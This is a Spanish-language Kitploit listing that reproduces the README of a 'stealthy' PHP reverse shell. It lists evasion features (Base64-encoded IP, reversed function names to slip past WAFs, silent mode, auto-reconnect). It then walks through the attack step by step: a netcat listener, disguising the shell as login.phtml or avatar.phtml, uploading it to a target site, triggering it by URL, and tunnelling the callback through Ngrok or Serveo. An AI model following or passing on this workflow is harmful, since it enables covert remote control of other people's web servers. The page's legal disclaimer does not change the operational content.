Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PHP-REVERSE-SHELL — Este es un potente y sigiloso reverse shell en PHP diseñado para hacking ético y pruebas de penetración. Establece una conexión confiable y silenciosa de vuelta a tu máquina. | Kitploit
Herramientas/GitLabGitLab/s_r_e_e_r_a_j/php-reverse-shell
Generación de PayloadsEvasión de IDS/IPSExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed TeamingHerramienta de Acceso Remoto

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitLabs_r_e_e_r_a_j/php-reverse-shell

PHP-REVERSE-SHELL

Este es un potente y sigiloso reverse shell en PHP diseñado para hacking ético y pruebas de penetración. Establece una conexión confiable y silenciosa de vuelta a tu máquina.

Ver Repositorio
1hace 11 mesesAún no revisado

PHP Reverse Shell (Potente y Sigiloso)

Este es un potente y sigiloso PHP reverse shell diseñado para hacking ético y pruebas de penetración. Establece una conexión confiable y silenciosa de vuelta a tu máquina.

⚠️ Aviso legal

Este PHP reverse shell ha sido desarrollado estrictamente con fines educativos y de pruebas de penetración autorizadas.
El desarrollador no se hace responsable de ningún uso indebido, daño o actividad ilegal realizada con este reverse_shell.
Úsalo de manera responsable y solo en sistemas que poseas o para los que tengas permiso explícito de pruebas. El acceso no autorizado es ilegal y castigado por la ley.

Características

  • La IP y el comando shell están codificados en Base64 para pasar desapercibido

  • Los nombres de las funciones están invertidos para evadir WAF y filtros de seguridad

  • Modo silencioso — no se muestra salida para evitar detección

  • Se reconecta automáticamente si la conexión se cae

  • Puede ejecutarse como un demonio en segundo plano (si el servidor lo permite)

  • Funciona en la mayoría de servidores con PHP habilitado

  • Soporta servicios de tunelización como Ngrok, Serveo

  • Subir con extensión .phtml para evadir algunos filtros

Cómo Usar

1. Inicia un listener en tu máquina

root@kitploit:~
nc -lvnp 4444

2. Codifica tu IP o nombre de host en Base64

Usa este simple comando:

root@kitploit:~
echo "your_ip_or_hostname" | base64

Ejemplo:

root@kitploit:~
echo "192.168.1.5" | base64

Copia la salida y reemplaza el valor de $ip_b64 en el script PHP reverse shell.

3. Actualiza tu script PHP reverse shell:

Cambia estas líneas con tu IP/nombre de host codificada en Base64 y puerto:

root@kitploit:~
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;

4. Renombra el archivo y súbelo

Renombra el archivo a algo menos sospechoso, por ejemplo:

  • login.phtml

  • avatar.phtml

  • update.phtml

Usar la extensión .phtml ayuda a que el archivo se ejecute en algunos servidores que bloquean .php.

Sube este archivo al sitio web objetivo donde se permitan subidas de archivos.

5. Activa el reverse shell

Abre el archivo subido en un navegador:

root@kitploit:~
http://target.com/uploads/login.phtml

Una vez abierto, tu listener recibirá una conexión reverse shell.

Usando Tunelización (Cuando tu IP no es Pública)

Si estás usando datos móviles o detrás de un router (NAT), tu IP podría no ser pública. En ese caso, el reverse shell no puede alcanzar tu máquina directamente.

Para solucionarlo, usa herramientas de tunelización TCP como Ngrok o Serveo.

Ngrok (Recomendado)

Instala Ngrok
Ejecuta este comando:

root@kitploit:~
ngrok tcp 4444

Mostrará algo como:

root@kitploit:~
Forwarding tcp://4.tcp.ngrok.io:18900

Actualiza tu script PHP reverse shell:

root@kitploit:~
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;

Inicia tu listener:

root@kitploit:~
nc -lvnp 4444

Serveo

Ejecuta este comando:

root@kitploit:~
ssh -R 0:localhost:4444 serveo.net

Dirá algo como:

root@kitploit:~
Forwarding TCP connections from serveo.net:46603

Actualiza tu script PHP reverse shell:

root@kitploit:~
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;

Inicia tu listener:

root@kitploit:~
nc -lvnp 4444

Licencia

Este proyecto está licenciado bajo la GNU General Public License v3.0

Descargar herramienta